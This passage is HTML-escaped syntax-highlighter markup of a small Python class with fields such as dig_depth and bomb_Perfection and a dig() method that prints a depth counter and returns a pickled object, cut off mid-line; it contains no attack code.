!important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-25&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;name&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-26&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;dig_depth&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-27&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;bomb_Perfection&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-28&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tools&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-29&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworkers&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-30&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;day&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;day&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-31&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-32&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;dig&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-33&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;dig_depth&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-34&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;# never ending digging......&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-35&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;print&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot; %s : [Dig] depth = %d&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;%&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;dig_depth&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-36&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;pickle&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;dumps&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span 